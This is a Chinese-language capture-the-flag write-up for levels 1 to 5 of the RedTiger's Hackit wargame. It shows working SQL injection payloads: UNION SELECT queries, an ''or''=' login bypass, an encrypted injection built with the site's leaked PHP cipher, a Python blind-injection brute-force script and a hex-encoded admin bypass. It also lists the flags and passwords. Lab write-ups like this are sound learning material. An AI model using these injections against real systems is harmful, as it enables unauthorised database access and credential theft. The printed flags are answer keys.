writeup--RedTiger's Hackit

RedTiger’s Hackit

第一关

首先点进Category 1
网址后面跟了?cat=1，很明显是一个sql注入
看了下还给了表名。。Tablename: level1_users
构造了下
https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users

得到密码thatwaseasy

flag是27cbddc803ecde822d87a7e8639f9315

第二关

看见有登录框，应该也是sql注入
用万能用户密码’or ”=’试了下，成功注入

flag是1222e2d4ad5da677efb188550528bfaa

第三关

看到提示Get an error。。。弄了半天弄不出error，看了下别人的wp，改成?usr[1]=1得到error信息，
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25

然后看了下urlcrypt.inc，有下面的代码，看来cow和admin后面的一大串都是加密过的，既然给了加密和解密的函数，直接写sql注入然后加密再传过去就可以了，话说它的加密方式还更新过。。这个如果要用的话要在linux下面加密，在windows下可能会乱码

<?php    // warning! ugly code ahead :)    function encrypt($str)    {        $cryptedstr = "";        srand(3284724);        for ($i =0; $i < strlen($str); $i++)        {            $temp = ord(substr($str,$i,1)) ^ rand(0, 255);            while(strlen($temp)<3)            {                $temp = "0".$temp;            }            $cryptedstr .= $temp. "";        }        return base64_encode($cryptedstr);    }    function decrypt ($str)    {        srand(3284724);        if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))        {            $str = base64_decode($str);            if ($str != "" && $str != null && $str != false)            {                $decStr = "";                for ($i=0; $i < strlen($str); $i+=3)                {                    $array[$i/3] = substr($str,$i,3);                }                foreach($array as $s)                {                    $a = $s ^ rand(0, 255);                    $decStr .= chr($a);                }                return $decStr;            }            return false;        }        return false;    }?>

构造的明文为’ union select 1,password,2,3,4,5,6 from level3_users where username=’Admin
加密后得到
https://redtiger.labs.overthewire.org/level3.php?usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw

拿到flag：a707b245a60d570d25a0449c2a516eca

第四关

点了下click me，发现多了?id=1 很明显是可以注入，看了下主页的标题是盲注。。
先猜keyword有多长
http://redtiger.labs.overthewire.org/level4.php?id=1%20and%200%3C(select%20count(*)%20from%20level4_secret%20where%20length(keyword)=21)
发现长度为21，那写个python脚本来爆破一下

from urllib.request import *import stringfrom re import *char=string.printableurl="http://redtiger.labs.overthewire.org/level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,{0},1)='{1}')"login ={'Cookie':'level4login=there_is_no_bug'}answer=""for q in range(1,22):    for i in char:        test=(url .format(q,i))        request=Request(test,None,headers=login)        a=urlopen(request)        s=a.read().decode()        if(findall("Query returned 1 rows.",s)):            print("{0}  ".format(q)+i)            answer+=i            breakprint(answer)

得到keyword为 killstickswithbr1cks!

flag: e8bcb79c389f5e295bac81fda9fd7cfa

第五关

看到描述watch the login errors
然后输admin进去试下，然后输入框消失了，看来是过滤了admin
然后发现它也无视大小写，那直接用十六进制来绕过吧
根据提示密码要md5加密
构造出
’ union select 0x61646d696e as username, md5(123) as password #

flag为ca5c3c4f0bc85af1392aef35fc1d09b3

未完待续